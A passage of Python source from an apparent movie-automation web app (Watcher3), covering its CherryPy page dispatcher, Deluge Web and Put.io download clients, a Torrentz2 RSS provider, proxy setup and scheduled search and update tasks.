logging.error('Unable to restore backup.', exc_info=True)
return {'response': False}
threading.Timer(3, core.restart).start()
return {'response': True}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_task_execute(self, name):
''' Calls task's now() function to execute task now
name (str): name of scheduled task to run
Response includes core.NOTIFICATIONS so the browser can display any
notifications generated during the task.
Returns dict ajax-style response
'''
try:
logging.info('Manually executing task {}.'.format(name))
task = core.scheduler_plugin.task_list[name]
task.now()
le = task.last_execution
return {'response': True, 'message': _('Finished task {}.').format(name), 'last_execution': le, 'notifications': core.NOTIFICATIONS}
except Exception as e:
return {'response': False, 'error': str(e)}
```
#### File: Watcher3/core/app.py
```python
import cherrypy
import core
from core import ajax, scheduler, plugins, localization, api
from core.auth import AuthController
from core.postprocessing import Postprocessing
import os
import json
from mako.template import Template
import sys
import time
locale_dir = os.path.join(core.PROG_PATH, 'locale')
class App(object):
@cherrypy.expose
def __init__(self):
self.auth = AuthController()
self.postprocessing = Postprocessing()
self.api = api.API()
if core.CONFIG['Server']['authrequired']:
self._cp_config = {
'auth.require': []
}
self.ajax = ajax.Ajax()
localization.get()
localization.install()
# point server toward custom 404
cherrypy.config.update({
'error_page.404': self.error_page_404
})
# Lock down settings if required
if core.CONFIG['Server']['adminrequired']:
self.settings._cp_config['auth.require'] = [core.auth.is_admin]
if core.CONFIG['Server']['checkupdates']:
scheduler.AutoUpdateCheck.update_check(install=False)
def https_redirect(self=None):
''' Cherrypy tool to redirect http:// to https://
Use as before_handler when https is enabled for the server.
Enable in config as {'tools.https_redirect.on': True}
'''
if cherrypy.request.scheme == 'http':
raise cherrypy.HTTPRedirect(cherrypy.url().replace('http:', 'https:'), status=302)
cherrypy.tools.https_redirect = cherrypy.Tool('before_handler', https_redirect)
def defaults(self):
defaults = {'head': self.head(),
'navbar': self.nav_bar(current=sys._getframe().f_back.f_code.co_name),
'url_base': core.URL_BASE
}
return defaults
# All dispatching methods from here down
status_template = Template(filename='templates/library/status.html', module_directory=core.MAKO_CACHE)
manage_template = Template(filename='templates/library/manage.html', module_directory=core.MAKO_CACHE)
import_template = Template(filename='templates/library/import.html', module_directory=core.MAKO_CACHE)
couchpotato_template = Template(filename='templates/library/import/couchpotato.html', module_directory=core.MAKO_CACHE)
kodi_template = Template(filename='templates/library/import/kodi.html', module_directory=core.MAKO_CACHE)
plex_template = Template(filename='templates/library/import/plex.html', module_directory=core.MAKO_CACHE)
directory_template = Template(filename='templates/library/import/directory.html', module_directory=core.MAKO_CACHE)
stats_template = Template(filename='templates/library/stats.html', module_directory=core.MAKO_CACHE)
add_movie_template = Template(filename='templates/add_movie.html', module_directory=core.MAKO_CACHE)
server_template = Template(filename='templates/settings/server.html', module_directory=core.MAKO_CACHE)
search_template = Template(filename='templates/settings/search.html', module_directory=core.MAKO_CACHE)
quality_template = Template(filename='templates/settings/quality.html', module_directory=core.MAKO_CACHE)
indexers_template = Template(filename='templates/settings/indexers.html', module_directory=core.MAKO_CACHE)
downloader_template = Template(filename='templates/settings/downloader.html', module_directory=core.MAKO_CACHE)
postprocessing_template = Template(filename='templates/settings/postprocessing.html', module_directory=core.MAKO_CACHE)
plugins_template = Template(filename='templates/settings/plugins.html', module_directory=core.MAKO_CACHE)
logs_template = Template(filename='templates/settings/logs.html', module_directory=core.MAKO_CACHE)
system_template = Template(filename='templates/settings/system.html', module_directory=core.MAKO_CACHE)
shutdown_template = Template(filename='templates/system/shutdown.html', module_directory=core.MAKO_CACHE)
restart_template = Template(filename='templates/system/restart.html', module_directory=core.MAKO_CACHE)
update_template = Template(filename='templates/system/update.html', module_directory=core.MAKO_CACHE)
fourohfour_template = Template(filename='templates/404.html', module_directory=core.MAKO_CACHE)
head_template = Template(filename='templates/head.html', module_directory=core.MAKO_CACHE)
navbar_template = Template(filename='templates/navbar.html', module_directory=core.MAKO_CACHE)
@cherrypy.expose
def default(self):
return self.library('status')
@cherrypy.expose
def _test(self):
return 'This is not the page you are looking for.'
@cherrypy.expose
def library(self, *path):
page = path[0] if len(path) > 0 else 'status'
if page == 'status':
mc, fc = core.sql.get_library_count()
return App.status_template.render(profiles=core.CONFIG['Quality']['Profiles'].keys(), movie_count=mc, finished_count=fc, **self.defaults())
elif page == 'manage':
movies = core.sql.get_user_movies()
return App.manage_template.render(movies=movies, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif page == 'import':
subpage = path[1] if len(path) > 1 else None
if not subpage:
return App.import_template.render(**self.defaults())
elif subpage == 'couchpotato':
return App.couchpotato_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif subpage == 'kodi':
return App.kodi_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif subpage == 'plex':
return App.plex_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif subpage == 'directory':
try:
start_dir = os.path.expanduser('~')
file_list = [i for i in os.listdir(start_dir) if os.path.isdir(os.path.join(start_dir, i)) and not i.startswith('.')]
except Exception as e:
start_dir = core.PROG_PATH
file_list = [i for i in os.listdir(start_dir) if os.path.isdir(os.path.join(start_dir, i)) and not i.startswith('.')]
file_list.append('..')
return App.directory_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), current_dir=start_dir, file_list=file_list, **self.defaults())
else:
return self.error_page_404()
elif page == 'stats':
App.stats_template = Template(filename='templates/library/stats.html', module_directory=core.MAKO_CACHE)
return App.stats_template.render(**self.defaults())
else:
return self.error_page_404()
@cherrypy.expose
def add_movie(self):
return App.add_movie_template.render(profiles=[(k, v.get('default', False)) for k, v in core.CONFIG['Quality']['Profiles'].items()], **self.defaults())
@cherrypy.expose
def settings(self, *path):
page = path[0] if len(path) > 0 else 'server'
if page == 'server':
themes = [i[:-4] for i in os.listdir('static/css/themes/') if i.endswith('.css') and os.path.isfile(os.path.join(core.PROG_PATH, 'static/css/themes', i))]
return App.server_template.render(config=core.CONFIG['Server'], themes=themes, version=core.CURRENT_HASH or '', languages=core.LANGUAGES.keys(), **self.defaults())
elif page == 'search':
return App.search_template.render(config=core.CONFIG['Search'], **self.defaults())
elif page == 'quality':
return App.quality_template.render(config=core.CONFIG['Quality'], sources=core.SOURCES, **self.defaults())
elif page == 'indexers':
return App.indexers_template.render(config=core.CONFIG['Indexers'], **self.defaults())
elif page == 'downloader':
return App.downloader_template.render(config=core.CONFIG['Downloader'], **self.defaults())
elif page == 'postprocessing':
return App.postprocessing_template.render(config=core.CONFIG['Postprocessing'], os=core.PLATFORM, **self.defaults())
elif page == 'plugins':
plugs = plugins.list_plugins()
return App.plugins_template.render(config=core.CONFIG['Plugins'], plugins=plugs, **self.defaults())
elif page == 'logs':
logdir = os.path.join(core.PROG_PATH, core.LOG_DIR)
logfiles = [i for i in os.listdir(logdir) if os.path.isfile(os.path.join(logdir, i))]
return App.logs_template.render(logdir=logdir, logfiles=logfiles, **self.defaults())
elif page == 'download_log':
if len(path) > 1:
l = os.path.join(os.path.abspath(core.LOG_DIR), path[1])
return cherrypy.lib.static.serve_file(l, 'application/x-download', 'attachment')
else:
raise cherrypy.HTTPError(400)
elif page == 'system':
tasks = {}
for name, obj in core.scheduler_plugin.task_list.items():
tasks[name] = {'name': name,
'interval': obj.interval,
'last_execution': obj.last_execution,
'enabled': obj.timer.is_alive() if obj.timer else False}
system = {'database': {'file': core.DB_FILE,
'size': os.path.getsize(core.DB_FILE) / 1024
},
'config': {'file': core.CONF_FILE},
'system': {'path': core.PROG_PATH,
'arguments': sys.argv,
'version': sys.version[:5]}
}
t = int(time.time())
dt = time.strftime('%a, %B %d, %Y %H:%M:%S %z', time.localtime(t))
return App.system_template.render(config=core.CONFIG['System'], tasks=json.dumps(tasks), system=system, server_time=[dt, t], **self.defaults())
else:
return self.error_page_404()
settings._cp_config = {}
@cherrypy.expose
def system(self, *path, **kwargs):
if len(path) == 0:
return self.error_page_404()
page = path[0]
if page == 'shutdown':
return App.shutdown_template.render(**self.defaults())
if page == 'restart':
return App.restart_template.render(**self.defaults())
if page == 'update':
return App.update_template.render(updating=core.UPDATING, **self.defaults())
@cherrypy.expose
def error_page_404(self, *args, **kwargs):
return App.fourohfour_template.render(**self.defaults())
def head(self):
return App.head_template.render(url_base=core.URL_BASE, uitheme=core.CONFIG['Server']['uitheme'], notifications=json.dumps([i for i in core.NOTIFICATIONS if i is not None]), language=core.LANGUAGE)
def nav_bar(self, current=None):
username = cherrypy.session.get(core.SESSION_KEY)
return App.navbar_template.render(url_base=core.URL_BASE, current=current, username=username)
```
#### File: core/downloaders/DelugeWeb.py
```python
import logging
import json
import re
import core
from core.helpers import Torrent, Url
cookie = None
command_id = 0
label_fix = re.compile('[^a-z0-9_-]')
headers = {'Content-Type': 'application/json', 'User-Agent': 'Watcher'}
logging = logging.getLogger(__name__)
def test_connection(data):
''' Tests connectivity to deluge web client
data: dict of deluge server information
Return True on success or str error message on failure
'''
logging.info('Testing connection to Deluge Web UI.')
host = data['host']
port = data['port']
password = data['pass']
url = '{}:{}/json'.format(host, port)
return _login(url, password)
def add_torrent(data):
''' Adds torrent or magnet to deluge web api
data (dict): torrrent/magnet information
Adds torrents to default/path/<category>
Returns dict ajax-style response
'''
global command_id
logging.info('Sending torrent {} to Deluge Web UI.'.format(data['title']))
conf = core.CONFIG['Downloader']['Torrent']['DelugeWeb']
host = conf['host']
port = conf['port']
url = '{}:{}/json'.format(host, port)
priority_keys = {
'Low': 64,
'Normal': 128,
'High': 255,
}
if cookie is None:
if _login(url, conf['pass']) is not True:
return {'response': False, 'error': 'Incorrect usename or password.'}
download_dir = _get_download_dir(url)
if not download_dir:
return {'response': False, 'error': 'Unable to get path information.'}
# if we got download_dir we can connect.
download_dir = '{}/{}'.format(download_dir, conf['category'])
# if file is a torrent, have deluge download it to a tmp dir
if data['type'] == 'torrent':
tmp_torrent_file = _get_torrent_file(data['torrentfile'], url)
if tmp_torrent_file['response'] is True:
torrent = {'path': tmp_torrent_file['torrentfile'], 'options': {}}
else:
return {'response': False, 'error': tmp_torrent_file['error']}
else:
torrent = {'path': data['torrentfile'], 'options': {}}
torrent['options']['add_paused'] = conf['addpaused']
torrent['options']['download_location'] = download_dir
torrent['options']['priority'] = priority_keys[conf['priority']]
command = {'method': 'web.add_torrents',
'params': [[torrent]],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(url, post_data=post_data, headers=headers)
response = json.loads(response.text)
if response['result'] is True:
downloadid = Torrent.get_hash(data['torrentfile'])
else:
return {'response': False, 'error': response['error']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Delugeweb add_torrent', exc_info=True)
return {'response': False, 'error': str(e)}
_set_label(downloadid, conf['category'], url)
return {'response': True, 'downloadid': downloadid}
def _set_label(torrent, label, url):
''' Sets label for download
torrent: str hash of torrent to apply label
label: str name of label to apply
url: str url of deluge web interface
Returns bool
'''
global command_id
label = label_fix.sub('', label.lower()).replace(' ', '')
logging.info('Applying label {} to torrent {} in Deluge Web UI.'.format(label, torrent))
command = {'method': 'label.get_labels',
'params': [],
'id': command_id
}
command_id += 1
try:
response = Url.open(url, post_data=json.dumps(command), headers=headers).text
deluge_labels = json.loads(response).get('result') or []
except Exception as e:
logging.error('Unable to get labels from Deluge Web UI.', exc_info=True)
return False
if label not in deluge_labels:
logging.info('Adding label {} to Deluge.'.format(label))
command = {'method': 'label.add',
'params': [label],
'id': command_id
}
command_id += 1
try:
sc = Url.open(url, post_data=json.dumps(command), headers=headers).status_code
if sc != 200:
logging.error('Deluge Web UI response {}.'.format(sc))
return False
except Exception as e:
logging.error('Delugeweb get_labels.', exc_info=True)
return False
try:
command = {'method': 'label.set_torrent',
'params': [torrent.lower(), label],
'id': command_id
}
command_id += 1
sc = Url.open(url, post_data=json.dumps(command), headers=headers).status_code
if sc != 200:
logging.error('Deluge Web UI response {}.'.format(sc))
return False
except Exception as e:
logging.error('Delugeweb set_torrent.', exc_info=True)
return False
return True
def _get_torrent_file(torrent_url, deluge_url):
global command_id
command = {'method': 'web.download_torrent_from_url',
'params': [torrent_url],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(deluge_url, post_data=post_data, headers=headers)
response = json.loads(response.text)
if response['error'] is None:
return {'response': True, 'torrentfile': response['result']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Delugeweb download_torrent_from_url', exc_info=True)
return {'response': False, 'error': str(e)}
def _get_download_dir(url):
global command_id
logging.debug('Getting default download dir from Deluge Web UI.')
command = {'method': 'core.get_config_value',
'params': ['download_location'],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(url, post_data=post_data, headers=headers)
response = json.loads(response.text)
return response['result']
except Exception as e:
logging.error('delugeweb get_download_dir', exc_info=True)
return {'response': False, 'error': str(e)}
def _login(url, password):
global command_id
global cookie
logging.info('Logging in to Deluge Web UI.')
command = {'method': 'auth.login',
'params': [password],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
try:
response = Url.open(url, post_data=post_data, headers=headers)
cookie = response.headers.get('Set-Cookie')
if cookie is None:
return 'Incorrect password.'
body = json.loads(response.text)
if body['error'] is None:
return True
else:
return response.msg
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('DelugeWeb test_connection', exc_info=True)
return '{}.'.format(e)
def cancel_download(downloadid):
global command_id
logging.info('Cancelling download {} in Deluge Web UI'.format(downloadid))
conf = core.CONFIG['Downloader']['Torrent']['DelugeWeb']
host = conf['host']
port = conf['port']
url = '{}:{}/json'.format(host, port)
if cookie is None:
_login(url, conf['pass'])
command = {'method': 'core.remove_torrent',
'params': [downloadid.lower(), True],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(url, post_data=post_data, headers=headers)
response = json.loads(response.text)
return response['result']
except Exception as e:
logging.error('delugeweb get_download_dir', exc_info=True)
return {'response': False, 'error': str(e)}
```
#### File: core/downloaders/PutIO.py
```python
import logging
import core
import json
import os
from core.helpers import Url
logging = logging.getLogger(__name__)
url_base = "https://api.put.io/v2/{}?oauth_token={}"
def requires_oauth(func):
''' Decorator to check if oauthtoken exists before calling actual method
'''
def decor(*args, **kwargs):
if not core.CONFIG['Downloader']['Torrent']['PutIO']['oauthtoken']:
logging.debug('Cannot execute Put.IO method -- no OAuth Token in config.')
return {'response': False, 'error': 'No OAuth Token. Create OAuth token on Put.io and enter in settings.'}
return func(*args, **kwargs)
return decor
def test_connection(data):
''' Tests connectivity to Put.IO
data: dict of Put.IO server information
Return True on success or str error message on failure
'''
logging.info('Testing connection to Put.IO.')
if not core.CONFIG['Downloader']['Torrent']['PutIO']['oauthtoken']:
logging.debug('Cannot execute Put.IO method -- no OAuth Token in config.')
return 'No Application Token. Create Application token and enter in settings.'
response = Url.open(url_base.format('account/info', core.CONFIG['Downloader']['Torrent']['PutIO']['oauthtoken']))
if response.status_code != 200:
return '{}: {}'.format(response.status_code, response.reason)
response = json.loads(response.text)
if response['status'] != 'OK':
logging.debug('Cannot connect to Put.IO: {}'.format(response['error_message']))
return response['error_message']
else:
return True
@requires_oauth
def add_torrent(data):
''' Adds torrent or magnet to Put.IO
data: dict of torrrent/magnet information
Adds torrents to /default/path/<category>
Returns dict {'response': True, 'downloadid': 'id'}
{'response': False', 'error': 'exception'}
'''
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
url = url_base.format('transfers/add', conf['oauthtoken'])
post_data = {'url': data['torrentfile']}
if conf['directory']:
post_data['save_parent_id'] = conf['directory']
if conf['postprocessingenabled']:
post_data['callback_url'] = '{}/postprocessing/putio_process?apikey={}'.format(conf['externaladdress'], core.CONFIG['Server']['apikey'])
try:
response = Url.open(url, post_data=post_data)
except Exception as e:
logging.warning('Cannot send download to Put.io', exc_info=True)
return {'response': False, 'error': str(e)}
if response.status_code != 200:
return {'response': False, 'error': '{}: {}'.format(response.status_code, response.reason)}
try:
response = json.loads(response.text)
downloadid = response['transfer']['id']
except Exception as e:
logging.warning('Unexpected response from Put.io', exc_info=True)
return {'response': False, 'error': 'Invalid JSON response from Put.IO'}
return {'response': True, 'downloadid': downloadid}
@requires_oauth
def cancel_download(downloadid):
''' Cancels download in client
downloadid: int download id
Returns bool
'''
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
url = url_base.format('transfers/cancel', conf['oauthtoken'])
try:
response = Url.open(url, post_data={'id': downloadid})
except Exception as e:
logging.warning('Unable to cancel Put.io download.', exc_info=True)
return {'response': False, 'error': str(e)}
try:
if json.loads(response.text).get('status') == 'OK':
return True
else:
logging.warning('Unable to cancel Put.io download: {}'.format(response))
return False
except Exception as e:
logging.warning('Unable to cancel Put.io download', exc_info=True)
return False
@requires_oauth
def download(_id):
''' Gets link to file from Put.IO
_id (str/int): ID to download, can be file or dir
Downloads all files in putio dir
Returns dict
'''
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
try:
response = Url.open(url_base.format('files/{}'.format(_id), conf['oauthtoken']))
except Exception as e:
return {'response': False, 'error': str(e)}
try:
response = json.loads(response.text)
f_data = response['file']
except Exception as e:
return {'response': False, 'error': 'Invalid json response from Put.io'}
if f_data['content_type'] == 'application/x-directory':
file_list = _read_dir(f_data['id'], conf['oauthtoken'])
else:
file_list = [f_data]
download_dir = os.path.join(conf['downloaddirectory'], f_data['name'])
if not os.path.exists(download_dir):
try:
os.makedirs(download_dir)
except Exception as e:
logging.error('Cannot create download dir', exc_info=True)
return {'response': False, 'error': 'Cannot create download dir. {}'.format(str(e))}
else:
logging.warning('Download dir exists, existing files may be overwritten.')
download_results = []
for i in file_list:
download_results.append(_download_file(i, download_dir, conf['oauthtoken']))
logging.info('Download from Put.io finished:')
logging.info(json.dumps(download_results, indent=2))
return {'response': True, 'files': download_results, 'path': download_dir}
@requires_oauth
def delete(file_id):
''' Deletes file from Put.IO
file_id (str): Put.IO id # for file or folder
Returns bool
'''
logging.info('Deleting file {} on Put.IO'.format(file_id))
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
url = url_base.format('files/delete', conf['oauthtoken'])
try:
response = Url.open(url, post_data={'file_ids': file_id})
except Exception as e:
logging.warning('Could not delete files on Put.io', exc_info=True)
try:
response = json.loads(response.text)
except Exception as e:
logging.warning('Unexpected response from Put.IO', exc_info=True)
return response.get('status') == 'OK'
def _download_file(f_data, directory, token):
''' Downloads file to local dir
f_data (dict): Putio file metadata
directory (str): Path in which to save file
token (str): oauth token
Downloads file to local dir
Returns dict
'''
try:
response = Url.open(url_base.format('files/{}/download'.format(f_data['id']), token), stream=True)
except Exception as e:
logging.error('Unable to download file from Put.io', exc_info=True)
return {'success': False, 'name': f_data['name'], 'error': str(e)}
target_file = os.path.join(directory, f_data['name'])
try:
with open(target_file, 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
except Exception as e:
return {'success': False, 'name': f_data['name'], 'error': str(e)}
return {'success': True, 'name': f_data['name'], 'location': target_file}
def _read_dir(dir_id, token):
''' Recursively reads dir for all files
dir_id (str/int): Put.io directory #
Returns list of dicts
'''
files = []
try:
response = Url.open(url_base.format('files/list', token) + '&parent_id={}'.format(dir_id))
except Exception as e:
logging.warning('Unable to read files on Put.io', exc_info=True)
return []
try:
contents = json.loads(response.text)['files']
except Exception as e:
logging.warning('Unexpected response from Put.io')
return []
for i in contents:
if i['content_type'] == 'application/x-directory':
files += _read_dir(i['id'], token)
else:
files.append(i)
return files
```
#### File: providers/torrent_modules/torrentz2.py
```python
import core
import logging
from core.helpers import Url
from xml.etree.cElementTree import fromstring
from xmljson import yahoo
logging = logging.getLogger(__name__)
def search(imdbid, term):
proxy_enabled = core.CONFIG['Server']['Proxy']['enabled']
logging.info('Performing backlog search on Torrentz2 for {}.'.format(imdbid))
url = 'https://www.torrentz2.eu/feed?f={}'.format(term)
try:
if proxy_enabled and core.proxy.whitelist('https://www.torrentz2.e') is True:
response = Url.open(url, proxy_bypass=True).text
else:
response = Url.open(url).text
if response:
return _parse(response, imdbid)
else:
return []
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Torrentz2 search failed.', exc_info=True)
return []
def get_rss():
proxy_enabled = core.CONFIG['Server']['Proxy']['enabled']
logging.info('Fetching latest RSS from Torrentz2.')
url = 'https://www.torrentz2.eu/feed?f=movies'
try:
if proxy_enabled and core.proxy.whitelist('https://www.torrentz2.e') is True:
response = Url.open(url, proxy_bypass=True).text
else:
response = Url.open(url).text
if response:
return _parse(response, None)
else:
return []
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Torrentz2 RSS fetch failed.', exc_info=True)
return []
def _parse(xml, imdbid):
logging.info('Parsing Torrentz2 results.')
try:
items = yahoo.data(fromstring(xml))['rss']['channel']['item']
except Exception as e:
logging.error('Unexpected XML format from Torrentz2.', exc_info=True)
return []
results = []
for i in items:
result = {}
try:
desc = i['description'].split(' ')
hash_ = desc[-1]
m = (1024 ** 2) if desc[2] == 'MB' else (1024 ** 3)
result['score'] = 0
result['size'] = int(desc[1]) * m
result['status'] = 'Available'
result['pubdate'] = None
result['title'] = i['title']
result['imdbid'] = imdbid
result['indexer'] = 'Torrentz2'
result['info_link'] = i['link']
result['torrentfile'] = core.providers.torrent.magnet(hash_)
result['guid'] = hash_
result['type'] = 'magnet'
result['downloadid'] = None
result['seeders'] = int(desc[4])
result['download_client'] = None
result['freeleech'] = 0
results.append(result)
except Exception as e:
logging.error('Error parsing Torrentz2 XML.', exc_info=True)
continue
logging.info('Found {} results from Torrentz2.'.format(len(results)))
return results
```
#### File: Watcher3/core/proxy.py
```python
import urllib.request
import core
import logging
from core.helpers import Url
logging = logging.getLogger(__name__)
default_socket = urllib.request.socket.socket
bypass_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
proxy_socket = urllib.request.socket.socket
on = False
def create():
''' Starts proxy connection
Sets global on to True
Does not return
'''
global on
if not core.CONFIG['Server']['Proxy']['enabled']:
return
logging.info('Creating proxy connection.')
host = core.CONFIG['Server']['Proxy']['host']
port = core.CONFIG['Server']['Proxy']['port']
user = core.CONFIG['Server']['Proxy']['user'] or None
password = core.CONFIG['Server']['Proxy']['pass'] or None
if core.CONFIG['Server']['Proxy']['type'] == 'socks5':
logging.info('Creating socket for SOCKS5 proxy at {}:{}'.format(host, port))
if user and password:
addr = 'socks5://{}:{}@{}:{}'.format(user, password, host, port)
else:
addr = 'socks5://{}:{}'.format(host, port)
proxies = {'http': addr, 'https': addr}
Url.proxies = proxies
on = True
elif core.CONFIG['Server']['Proxy']['type'] == 'socks4':
logging.info('Creating socket for SOCKS4 proxy at {}:{}'.format(host, port))
if user and password:
addr = 'socks4://{}:{}@{}:{}'.format(user, password, host, port)
else:
addr = 'socks4://{}:{}'.format(host, port)
proxies = {'http': addr, 'https': addr}
Url.proxies = proxies
on = True
elif core.CONFIG['Server']['Proxy']['type'] == 'http(s)':
logging.info('Creating HTTP(S) proxy at {}:{}'.format(host, port))
protocol = host.split(':')[0]
proxies = {}
if user and password:
url = '{}:{}@{}:{}'.format(user, password, host, port)
else:
url = '{}:{}'.format(host, port)
proxies['http'] = url
if protocol == 'https':
proxies['https'] = url
else:
logging.warning('HTTP-only proxy. HTTPS traffic will not be tunneled through proxy.')
Url.proxies = proxies
on = True
else:
logging.warning('Invalid proxy type {}'.format(core.CONFIG['Server']['Proxy']['type']))
return
def destroy():
''' Ends proxy connection
Sets global on to False
Does not return
'''
global on
if on:
logging.info('Closing proxy connection.')
Url.proxies = None
on = False
return
else:
return
def whitelist(url):
''' Checks if url is in whitelist
url (str): url to check against whitelist
Returns bool
'''
whitelist = core.CONFIG['Server']['Proxy']['whitelist'].split(',')
if whitelist == ['']:
return False
for i in whitelist:
if url.startswith(i.strip()):
logging.info('{} in proxy whitelist, will bypass proxy connection.'.format(url))
return True
else:
continue
return False
def bypass(request):
''' Temporaily turns off proxy for single request.
request (object): urllib.request request object
Restores the default urllib.request socket and uses the default opener to send request.
When finished restores the proxy socket. If using an http/s proxy the socket is
restored to the original, so it never changes anyway.
Should always be inside a try/except block just like any url request.
Returns object urllib.request response
'''
urllib.request.socket.socket = default_socket
response = bypass_opener.open(request)
result = response.read().decode('utf-8')
response.close()
urllib.request.socket.socket = proxy_socket
return result
```
#### File: Watcher3/core/scheduler.py
```python
import datetime
import logging
import cherrypy
import core
import os
import time
import hashlib
from core import searcher, postprocessing
from core.rss import imdb, popularmovies
from lib.cherrypyscheduler import SchedulerPlugin
from core import trakt
from core.library import Metadata, Manage
logging = logging.getLogger(__name__)
pp = postprocessing.Postprocessing()
search = searcher
def create_plugin():
''' Creates plugin instance, adds tasks, and subscribes to cherrypy.engine
Does not return
'''
logging.info('Initializing scheduler plugin.')
core.scheduler_plugin = SchedulerPlugin(cherrypy.engine, record_handler=record_handler)
AutoSearch.create()
AutoUpdateCheck.create()
ImdbRssSync.create()
MetadataUpdate.create()
PopularMoviesSync.create()
PostProcessingScan.create()
TraktSync.create()
FileScan.create()
core.scheduler_plugin.subscribe()
class record_handler(object):
@staticmethod
def read():
return {i['name']: {'last_execution': i['last_execution']} for i in core.sql.dump('TASKS')}
@staticmethod
def write(name, le):
if core.sql.row_exists('TASKS', name=name):
core.sql.update('TASKS', 'last_execution', le, 'name', name)
else:
core.sql.write('TASKS', {'last_execution': le, 'name': name})
return
class PostProcessingScan(object):
''' Scheduled task to automatically scan directory for movie to process '''
@staticmethod
def create():
conf = core.CONFIG['Postprocessing']['Scanner']
interval = conf['interval'] * 60
now = datetime.datetime.today()
hr = now.hour
minute = now.minute + interval
SchedulerPlugin.ScheduledTask(hr, minute, interval, PostProcessingScan.scan_directory, auto_start=conf['enabled'], name='PostProcessing Scan')
return
@staticmethod
def scan_directory():
''' Method to scan directory for movies to process '''
conf = core.CONFIG['Postprocessing']['Scanner']
d = conf['directory']
logging.info('Scanning {} for movies to process.'.format(d))
minsize = core.CONFIG['Postprocessing']['Scanner']['minsize'] * 1048576
files = []
if conf['newfilesonly']:
t = core.scheduler_plugin.record.get('PostProcessing Scan', {}).get('last_execution')
if not t:
logging.warning('Unable to scan directory, last scan timestamp unknown.')
return
le = datetime.datetime.strptime(t, '%Y-%m-%d %H:%M:%S')
threshold = time.mktime(le.timetuple())
logging.info('Scanning for new files only (last scan: {}).'.format(d, le))
for i in os.listdir(d):
f = os.path.join(d, i)
if os.path.isfile(f) and os.path.getmtime(f) > threshold and os.path.getsize(f) > minsize:
files.append(f)
elif os.path.isdir(f) and os.path.getmtime(f) > threshold:
files.append(f)
else:
for i in os.listdir(d):
f = os.path.join(d, i)
if os.path.isfile(f) and os.path.getsize(f) > minsize:
files.append(f)
elif os.path.isdir(f):
files.append(f)
if files == []:
logging.info('No new files found in directory scan.')
return
for i in files:
while i[-1] in ('\\', '/'):
i = i[:-1]
fname = os.path.basename(i)
logging.info('Processing {}.'.format(i))
r = core.sql.get_single_search_result('title', fname)
if r:
logging.info('Found match for {} in releases: {}.'.format(fname, r['title']))
else:
r['guid'] = 'postprocessing{}'.format(hashlib.md5(fname.encode('ascii', errors='ignore')).hexdigest()).lower()
logging.info('Unable to find match in database for {}, release cannot be marked as Finished.'.format(fname))
d = {'apikey': core.CONFIG['Server']['apikey'],
'mode': 'complete',
'path': i,
'guid': r.get('guid') or '',
'downloadid': ''
}
pp.default(**d)
class AutoSearch(object):
''' Scheduled task to automatically run search/snatch methods '''
@staticmethod
def create():
interval = core.CONFIG['Search']['rsssyncfrequency'] * 60
now = datetime.datetime.today()
hr = now.hour
min = now.minute + core.CONFIG['Search']['rsssyncfrequency']
SchedulerPlugin.ScheduledTask(hr, min, interval, search.search_all, auto_start=True, name='Movie Search')
class MetadataUpdate(object):
''' Scheduled task to automatically run metadata updater '''
@staticmethod
def create():
interval = 72 * 60 * 60 # 72 hours
now = datetime.datetime.today()
hr = now.hour
min = now.minute
SchedulerPlugin.ScheduledTask(hr, min, interval, MetadataUpdate.metadata_update, auto_start=True, name='Metadata Update')
return
@staticmethod
def metadata_update():
''' Updates metadata for library
If movie's theatrical release is more than a year ago it is ignored.
Checks movies with a missing 'media_release_date' field. By the time
this field is filled all other fields should be populated.
'''
logging.info('Updating library metadata.')
movies = core.sql.get_user_movies()
cutoff = datetime.datetime.today() - datetime.timedelta(days=365)
u = []
for i in movies:
if i['release_date'] and datetime.datetime.strptime(i['release_date'], '%Y-%m-%d') < cutoff:
continue
if not i['media_release_date'] and i['status'] not in ('Finished', 'Disabled'):
u.append(i)
if not u:
return
logging.info('Updating metadata for: {}.'.format(', '.join([i['title'] for i in u])))
for i in u:
Metadata.update(i.get('imdbid'), tmdbid=i.get('tmdbid'), force_poster=False)
return
class AutoUpdateCheck(object):
''' Scheduled task to automatically check git for updates and install '''
@staticmethod
def create():
interval = core.CONFIG['Server']['checkupdatefrequency'] * 3600
now = datetime.datetime.today()
hr = now.hour
min = now.minute + (core.CONFIG['Server']['checkupdatefrequency'] * 60)
if now.second > 30:
min += 1
if core.CONFIG['Server']['checkupdates']:
auto_start = True
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, AutoUpdateCheck.update_check, auto_start=auto_start, name='Update Checker')
return
@staticmethod
def update_check(install=True):
''' Checks for any available updates
install (bool): install updates if found
Setting 'install' for False will ignore user's config for update installation
If 'install' is True, user config must also allow automatic updates
Creates notification if updates are available.
Returns dict from core.updater.update_check():
{'status': 'error', 'error': <error> }
{'status': 'behind', 'behind_count': #, 'local_hash': 'abcdefg', 'new_hash': 'bcdefgh'}
{'status': 'current'}
'''
return core.updater.update_check(install=install)
